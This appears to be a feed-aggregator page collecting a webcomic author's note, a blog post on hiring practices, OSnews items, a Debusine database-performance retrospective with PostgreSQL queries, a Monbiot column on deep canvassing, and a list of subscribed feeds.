Obviously Deus has some broad-spectrum approach to resisting chemical influence in place. After all, he’s the leader of an up-and-coming, expanding nation, and seems to be, on the surface, doing a good job for the people under his administration. And he’s making enemies of every surrounding country and eventually he’s going to start hitting countries that third parties have financial interests in. Third parties like diamond oligopolies, mining consortia, all kinds of larger criminal organizations, and eventually, whole countries. Not to mention the Alari colony ship. They’ve agreed to live under his rule, but what that really means is they do whatever they want within their little fiefdom, which amounts to the area they’ve expanded their ship into, plus some extra land they negotiated with Deus, but outside of that, they’re subject to the laws of Galytn. They would immediately assume authority if something “happened” to him. That’s assuming they could keep Thothogoth from using Galytn as a foothold for his own conquest, or that either of them could stand up to the Supers in Deus’s military.

So Deus has some preventative measures and contingencies in place, they’re just not as overt as those of most comic book Super Smarts. You know, an army of Deus-bots, or a metal throne room with Kirby-esque pipes and energy fields full of dots that project force fields that can only be deactivated after he delivers a monologue.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament Quarter finalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:35

The shared tragedy of Red Queen hiring [Seth's Blog]

Runaway selection happens when organizations compete with each other far beyond the point where it’s rational to do so. We see this in species as well–peacocks have ungainly and inefficient feather displays because, as Alice’s Red Queen said, “It takes all the running you can do to keep in the same place.”

In organizations, there’s a desire to do good work. Pressure to outdo the others. And a desire for deniability and certainty. Add those up, and we are left with a quest for more long after it’s helpful.

How many people applied for that good job you just posted? 1,000? Spread the word: more applications must be a good thing. It’s not unusual for digitally-amplified hiring processes to see 5,000 applications arrive in a day. 360,000 people applied for a slot in the Goldman Sachs internship program. Would a million have been better?

And then, let’s use AI to pick the 80 best candidates and interview each via Zoom.

Take the ten best and put them through a series of interviews, rotating through each person on the team, including aptitude tests and real-time projects. In many organizations, there are 6, 7 or even 10 rounds of interviews.

It costs a typical organization more than $14,000 to hire an executive, and the time and emotional cost to applicants is many times that. This all leads to lowered productivity, wasted time and a damaged brand.

What do we get in exchange for this investment? Are the people hired with this exhausting/exhaustive process adding more value than the ones found with much less time ten years ago?

And the second question: would your third or fourth choice have worked out just as well, if not better?

If Red Queen hiring actually worked, then we’d see that organizations that spend more time on it would outperform those that don’t. It’s pretty clear to me that this isn’t the case–it’s not an investment in the future, it’s a sign of bureaucratic stasis, a quest for deniability, and a thoughtless pursuit of the wrong sort of more. We’ve made it much easier for people to apply for jobs, but done little to improve what happens after the applications arrive.

What if we spent the time wasted on Red Queen maximization doing something useful instead – training and orientation, perhaps? Interview until you find someone who can do the job, then hire them. Then get back to work.

We can’t even ask that question, because it feels like a compromise. Without any data at all, we’ve bought into the Red Queen race, trusting that our false proxies, sufficiently polished, deliver better results. In fact, there’s a huge increase in the cost to the applicants and the organization, but no measurable increase in the value created.

Successful fishermen understand that casting an ever-wider net is not always the best way to catch the fish you need.

10:28

Debian embraces reproducible builds [OSnews]

Big news from the Debian release team: Debian is going for reproducible package builds.

Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility.

↫ Paul Gevers

Reproducible means, in short, that building a package from the same source code always yields a bit-for-bit identical result, so you can verify that a package really was built from the source code it claims to come from. This provides a layer of defense against people tampering with code or otherwise trying to fiddle with the process between source code and final package on your system. This effort constitutes a tremendous amount of work, but it’s massively important.
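
The verification idea can be sketched in a toy example (this is only an illustration of the concept, not Debian’s actual tooling): if the build step is deterministic, anyone can rebuild from source and compare hashes against the published package.

```python
# Toy illustration of reproducible builds: a "build" is reproducible when
# the same input always yields a bit-for-bit identical output, so an
# independent rebuild can be checked against the published hash.
import hashlib

def build(source: bytes) -> bytes:
    # A deterministic build step: no timestamps, no randomness,
    # no build-path leakage in the output.
    return b"package:" + hashlib.sha256(source).digest()

source = b"int main(void) { return 0; }"
official = hashlib.sha256(build(source)).hexdigest()  # hash of distributed package
rebuilt = hashlib.sha256(build(source)).hexdigest()   # hash of independent rebuild
assert official == rebuilt
```

Non-determinism (embedded timestamps, random temporary paths, unsorted file listings) is exactly what breaks this equality in real packages.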

“Building a web server in aarch64 assembly to give my life (a lack of) meaning” [OSnews]

ymawky is a small, static http web server written entirely in aarch64 assembly for macos. it uses raw darwin syscalls with no libc wrappers, serves static files, supports GET, HEAD, PUT, OPTIONS, DELETE, byte ranges, directory listing, custom error pages, and tries to be as hardened as possible.

why? why not? the dream of the 80s is alive in ymawky. everybody has nginx. having apache makes you a square. so why not strip every single convenience layer that computer science has given us since 1957? i wanted to understand how a web server actually works, something i know little about coming from a low-level/systems background. the risks that come up, the problems that need to be solved, the things you don’t think about when you’re writing python or c.

this (probably) won’t replace nginx, but it is doing something in the most difficult way possible.

↫ Tony “imtomt”

I love this.

Object oriented programming in Ada [OSnews]

Ada is incredibly well designed. One way this shows is that it takes the big, monolithic features of other languages and breaks them down into their constituent parts, so we can choose which portions of those features we want. The example I often reach for to explain this is object-oriented programming.

↫ Christoffer Stjernlöf

Exactly what it says on the tin.

09:42

Freexian Collaborators: Debusine workflow performance issues (by Colin Watson) [Planet Debian]

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and learned from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking them so that they can be scheduled to idle workers). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.
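
The lock-ordering hazard in the first cause above is a classic one, and the standard remedy can be sketched in a few lines (hypothetical names, not Debusine’s actual code): if every updater acquires row locks in one globally consistent order, two concurrent updaters can never each hold a lock the other needs.

```python
# Deadlock avoidance by consistent lock ordering: all callers acquire
# locks on their row set in sorted order, so overlapping sets can never
# be taken in conflicting orders.
import threading

row_locks = {rid: threading.Lock() for rid in range(4)}

def update_rows(row_ids):
    ordered = sorted(row_ids)          # one global order for every caller
    for rid in ordered:
        row_locks[rid].acquire()
    try:
        pass                            # ... propagate state changes ...
    finally:
        for rid in reversed(ordered):
            row_locks[rid].release()

# Threads touching overlapping sets {0,1,2} and {2,1,3} cannot deadlock,
# because both acquire the shared rows 1 and 2 in the same sorted order.
t1 = threading.Thread(target=update_rows, args=([0, 1, 2],))
t2 = threading.Thread(target=update_rows, args=([2, 1, 3],))
t1.start(); t2.start(); t1.join(); t2.join()
```

Locking the whole workflow up front, as described above, is the heavyweight version of the same idea: one big lock acquired first, so propagation order no longer matters.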

Fixes

Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.
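
The caching fix can be sketched roughly like this (the class and names are hypothetical, not Debusine’s actual API): within one orchestrator run, each distinct lookup hits the database once and every repeat is served from a dictionary.

```python
# Per-run lookup cache: identical lookups within one orchestrator run are
# resolved once, instead of querying the database hundreds of times for
# the same answer as task data is passed down the workflow graph.
class OrchestratorRun:
    def __init__(self, resolver):
        self._resolver = resolver      # the expensive database lookup
        self._cache = {}               # lives only for this run

    def resolve(self, lookup):
        if lookup not in self._cache:
            self._cache[lookup] = self._resolver(lookup)
        return self._cache[lookup]

calls = []
def db_lookup(lookup):
    calls.append(lookup)               # stands in for a database query
    return f"artifact-for-{lookup}"

run = OrchestratorRun(db_lookup)
for _ in range(1000):
    run.resolve("glibc-build-log")     # same lookup, repeated down the graph
assert len(calls) == 1                 # resolved once, then served from cache
```

Scoping the cache to a single run sidesteps invalidation: the cache is simply discarded when the orchestrator finishes.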

Expiry

We had known for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

Reading up on row locks in PostgreSQL was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.
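
The trigger-to-tick change can be sketched as follows (hypothetical names): state changes merely mark the scheduler dirty, and a periodic tick performs a single scheduling pass no matter how many changes arrived in between.

```python
# Deferred scheduling: instead of a scheduling pass per change, changes
# set a dirty flag and a periodic tick coalesces them into one pass.
class Scheduler:
    def __init__(self):
        self.dirty = False
        self.passes = 0

    def notify_change(self):           # cheap: called on every state change
        self.dirty = True

    def tick(self):                    # periodic: at most one pass per interval
        if self.dirty:
            self.dirty = False
            self.passes += 1           # ... assign pending work requests ...

s = Scheduler()
for _ in range(500):
    s.notify_change()                  # a burst of work-request updates
s.tick()
assert s.passes == 1                   # one scheduling pass, not 500
```

This trades a little latency (work waits until the next tick) for far less redundant scheduling work and much clearer logs.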

The scheduler may not be able to assign a work request to an idle worker due to the workflow being locked. That isn’t a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if a work request is locked, then it might as well skip other work requests in the same workflow until the next scheduler run.
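
That skip heuristic looks roughly like this (hypothetical names, not the real scheduler): the first locked work request in a workflow disqualifies its siblings for the remainder of the pass.

```python
# Scheduler pass that skips siblings of a locked workflow instead of
# probing every pending work request in it one by one.
def schedule_pass(pending, try_assign):
    skipped_workflows = set()
    assigned = []
    for request in pending:
        wf = request["workflow"]
        if wf in skipped_workflows:
            continue                   # don't probe siblings of a locked workflow
        if try_assign(request):
            assigned.append(request["id"])
        else:
            skipped_workflows.add(wf)  # locked: give up on this workflow for now
    return assigned

pending = [{"id": i, "workflow": "big" if i < 5 else "small"} for i in range(6)]
probes = []
def try_assign(req):
    probes.append(req["id"])
    return req["workflow"] != "big"    # the "big" workflow is locked

assert schedule_pass(pending, try_assign) == [5]
assert probes == [0, 5]                # only one probe against the locked workflow
```

With thousands of pending requests in one large locked workflow, this turns a slow, noisy pass into a single failed probe.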

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left it unexplored. Eventually we thought to ask PostgreSQL’s own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that’s a lot of db_collectionitem updates and must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently-updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As per PostgreSQL’s documentation, by default UPDATE always performs physical updates to every matching row regardless of whether the data has changed, and our code to expire old task history entries was updating rows even when nothing about them had changed. Once we knew where to look, it was easy to add some extra constraints so that rows already in the desired state were skipped.
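
The shape of the fix, in a simplified sketch (hypothetical schema and names): filter out rows whose values would not change before issuing the update, so the database never rewrites tuples that are already in the target state.

```python
# Avoiding no-op updates: add a constraint so rows already in the target
# state are skipped, mirroring SQL along the lines of
#   UPDATE ... SET kept = false
#   WHERE id = ANY(...) AND kept IS DISTINCT FROM false
rows = [{"id": i, "kept": True} for i in range(10)]
rows[3]["kept"] = False               # this row is already expired

writes = []
def mark_not_kept(row_ids):
    for row in rows:
        # The extra constraint: only touch rows whose value actually changes.
        if row["id"] in row_ids and row["kept"] is not False:
            row["kept"] = False
            writes.append(row["id"])

mark_not_kept({2, 3, 4})
assert writes == [2, 4]               # row 3 was already expired: no write
```

In PostgreSQL terms, every skipped no-op update is a tuple that doesn’t get physically rewritten, which is where the drop in write volume comes from.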

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • Some more performance fixes are on their way to address remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!

08:49

In Bloom [Penny Arcade]

New Comic: In Bloom

06:56

Hear This [George Monbiot]

Radical Listening could transform our politics and block the rise of the far right.

By George Monbiot, published in the Guardian 7th May 2026

Most people have made up their minds, and nothing you can say will change them: that’s the credo of parties such as Labour and the Democrats. Don’t challenge voters on the doorstep. Use focus groups to find out what they want, and give it to them. Follow, don’t lead. But all that’s on them, not us.

It’s true that conventional attempts at persuasion fail. A meta-analysis and original experiments by the political scientists Joshua Kalla and David Broockman found that “the best estimate of the effects of campaign contact and advertising” in US general elections “is zero”. But this says nothing about voters and everything about the useless approach of the parties trying to reach them.

Further work by the same scientists along with other people’s studies show that persuasive methods do exist. They don’t change everyone’s minds, but they can make enough difference to win elections and build a kinder, fairer, greener country. These techniques are known as “deep canvassing”.

Deep canvassing works only if you have a large army of volunteers, ideally from the community you’re trying to reach. Instead of delivering a message then scuttling away, as conventional canvassers do, their role is to connect and listen. Across conversations that might last for 10 or 20 minutes, they let people discuss their feelings. Then, without arguing or judging, they share their own experiences and ask questions (“have you ever been treated unfairly?”) that might reveal common ground.

The technique was developed by LGBT activists in Los Angeles after a state referendum overturned same-sex marriage rights. They wanted to find out why and to see whether people could change their minds. They were amazed by the response, and asked researchers to study the technique. The effects turned out to be significant.

Not only is deep canvassing persuasive but, by contrast to almost all other approaches, the change appears to be durable, at least over the course of months. It seems to have been a decisive factor in the election of Zohran Mamdani as mayor of New York.

What makes the difference is the listening. There’s a solid rule in life: if you don’t listen to other people, they won’t listen to you. I’m often told that people are “too exhausted” to engage in politics. That can mean they’re overwhelmed by work and family life. But it can also refer to the exhaustion of being unheard. The sense that no one is listening is alienating and demoralising.

Another benefit is that deep canvassing allows people to change their minds without losing face. A study in the journal Political Communication found that when someone is heard attentively and without judgment, “they are more likely to become more open-minded and process information in a less defensive manner”. Active listening creates “a sense of shared social identity”, which can build “faith in wider democratic processes”.

All this is compelling enough, but there may be an even more effective means of connection (though it awaits quantification). I’ve been following the work of a remarkable group in my own constituency, South Devon, called Common Ground. It’s not attached to any party, but seeks to prevent the far right from gaining power, to counteract division and create what it calls “a longing for kindness”. Its annual budget is under £400. Instead of going to people’s doors, the volunteers set up a board in a busy street and begin by asking people to put stickers on a chart.

That’s another solid rule in life: people love stickers. On the board are questions designed to provoke conversation on issues such as the NHS, climate, the voting system, immigration, social media, Brexit, public services and polarisation, and boxes in which you can agree or disagree by adding a sticker.

The board is handwritten. Anthea Simmons, the driving force behind Common Ground, tells me this provides a reason to read out the questions to people who may be illiterate without embarrassing them. It’s also a way of starting a conversation. Then the volunteers ask people why they’ve made their choices. They listen attentively, occasionally saying something that connects their experiences, or gently correcting disinformation. It might be quick, it might go on for half an hour.

I’ve watched them at work in two places with high levels of deprivation and social crisis: Paignton and Brixham. These are prime targets for Reform UK, as alienation can easily be channelled into fury at immigrants and other out-groups.

In both places, a small crowd quickly formed around the board and people began chatting to each other as well as the volunteers. “Climate?” one person said. “It’s not affecting us very much yet.” Another replied: “My allotment disagrees. It’s a swamp.”

What leapt out immediately was that most respondents were far to the left of their own voting intentions. The distribution of their stickers suggested a very strong commitment to the NHS, action on climate, compassion, tolerance and an end to billionaire power. But many of the same people have voted or intend to vote for Reform, which would deliver the opposite. This discovery seemed to be equally startling to the participants.

Another thing I witnessed, especially when interviewing people just after these conversations, was a sense of relief, even exhilaration. People were buzzing. Some hardly seemed to hear my questions, but carried on talking about the issues that bothered them: the lack of NHS dentistry, the state of the harbour, corruption, AI, litter, the care crisis. It was as if a bottle had been uncorked.

Being heard is valuable in its own right. Loneliness and alienation, as well as being the feedstock of fascism, are major causes of human misery. The volunteers have been told by some people that it’s the only conversation they’ve had all week. Their overwhelming conclusion? People do care about the lives of others, even when influencers and algorithms push them towards hate and fear.

It wouldn’t be quite right to call this deep canvassing. The volunteers don’t have a script and they’re engaging across a range of issues rather than focusing on one. Perhaps it could be called “radical listening”. To judge by what I witnessed, they seem to have found a way of tearing down the walls dividing us. Do this everywhere, and who knows? We could have a very different country.

www.monbiot.com

Feeds

FeedRSSLast fetchedNext fetched after
@ASmartBear XML 22:07, Friday, 15 May 22:48, Friday, 15 May
a bag of four grapes XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Ansible XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Bad Science XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Black Doggerel XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Blog - Official site of Stephen Fry XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Charlie Brooker | The Guardian XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Charlie's Diary XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Chasing the Sunset - Comics Only XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Coding Horror XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Comics Archive - Spinnyverse XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Cory Doctorow's craphound.com XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Cory Doctorow, Author at Boing Boing XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Ctrl+Alt+Del Comic XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Cyberunions XML 21:56, Friday, 15 May 22:45, Friday, 15 May
David Mitchell | The Guardian XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Deeplinks XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Diesel Sweeties webcomic by rstevens XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Dilbert XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Dork Tower XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Economics from the Top Down XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Edmund Finney's Quest to Find the Meaning of Life XML 22:07, Friday, 15 May 22:50, Friday, 15 May
EFF Action Center XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Enspiral Tales - Medium XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Events XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Falkvinge on Liberty XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Flipside XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Flipside XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Free software jobs XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Full Frontal Nerdity by Aaron Williams XML 21:35, Friday, 15 May 22:23, Friday, 15 May
General Protection Fault: Comic Updates XML 21:35, Friday, 15 May 22:23, Friday, 15 May
George Monbiot XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Girl Genius XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Groklaw XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Grrl Power XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Hackney Anarchist Group XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Hackney Solidarity Network XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://blog.llvm.org/feeds/posts/default XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://calendar.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 21:56, Friday, 15 May 22:36, Friday, 15 May
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://eng.anarchoblogs.org/feed/atom/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://feed43.com/3874015735218037.xml XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://flatearthnews.net/flatearthnews.net/blogfeed XML 22:07, Friday, 15 May 22:48, Friday, 15 May
http://fulltextrssfeed.com/ XML 22:07, Friday, 15 May 22:50, Friday, 15 May
http://london.indymedia.org/articles.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&_render=rss XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://planet.gridpp.ac.uk/atom.xml XML 21:28, Friday, 15 May 22:15, Friday, 15 May
http://shirky.com/weblog/feed/atom/ XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://thecommune.co.uk/feed/ XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://theness.com/roguesgallery/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 21:56, Friday, 15 May 22:45, Friday, 15 May
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 21:35, Friday, 15 May 22:17, Friday, 15 May
http://www.baen.com/baenebooks XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.godhatesastronauts.com/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
http://www.tinycat.co.uk/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://anarchism.pageabode.com/blogs/anarcho/feed/ XML 21:49, Friday, 15 May 22:33, Friday, 15 May
https://broodhollow.krisstraub.com/feed/ XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://debian-administration.org/atom.xml XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://elitetheatre.org/ XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://feeds.feedburner.com/Starslip XML 21:35, Friday, 15 May 22:17, Friday, 15 May
https://feeds2.feedburner.com/GeekEtiquette?format=xml XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://hackbloc.org/rss.xml XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://kajafoglio.livejournal.com/data/atom/ XML 21:56, Friday, 15 May 22:45, Friday, 15 May
https://philfoglio.livejournal.com/data/atom/ XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://pixietrixcomix.com/eerie-cuties/comic.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://pixietrixcomix.com/menage-a-3/comic.rss XML 21:49, Friday, 15 May 22:33, Friday, 15 May
https://propertyistheft.wordpress.com/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://requiem.seraph-inn.com/updates.rss XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://studiofoglio.livejournal.com/data/atom/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://thecommandline.net/feed/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://torrentfreak.com/subscriptions/ XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://web.randi.org/?format=feed&type=rss XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://www.dcscience.net/feed/ XML 21:56, Friday, 15 May 22:45, Friday, 15 May
https://www.DropCatch.com/domain/steampunkmagazine.com XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://www.DropCatch.com/domain/ubuntuweblogs.org XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://www.DropCatch.com/redirect/?domain=DyingAlone.net XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://www.freedompress.org.uk:443/news/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
https://www.goblinscomic.com/category/comics/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://www.loomio.com/blog/feed/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://www.patreon.com/graveyardgreg/posts/comic.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
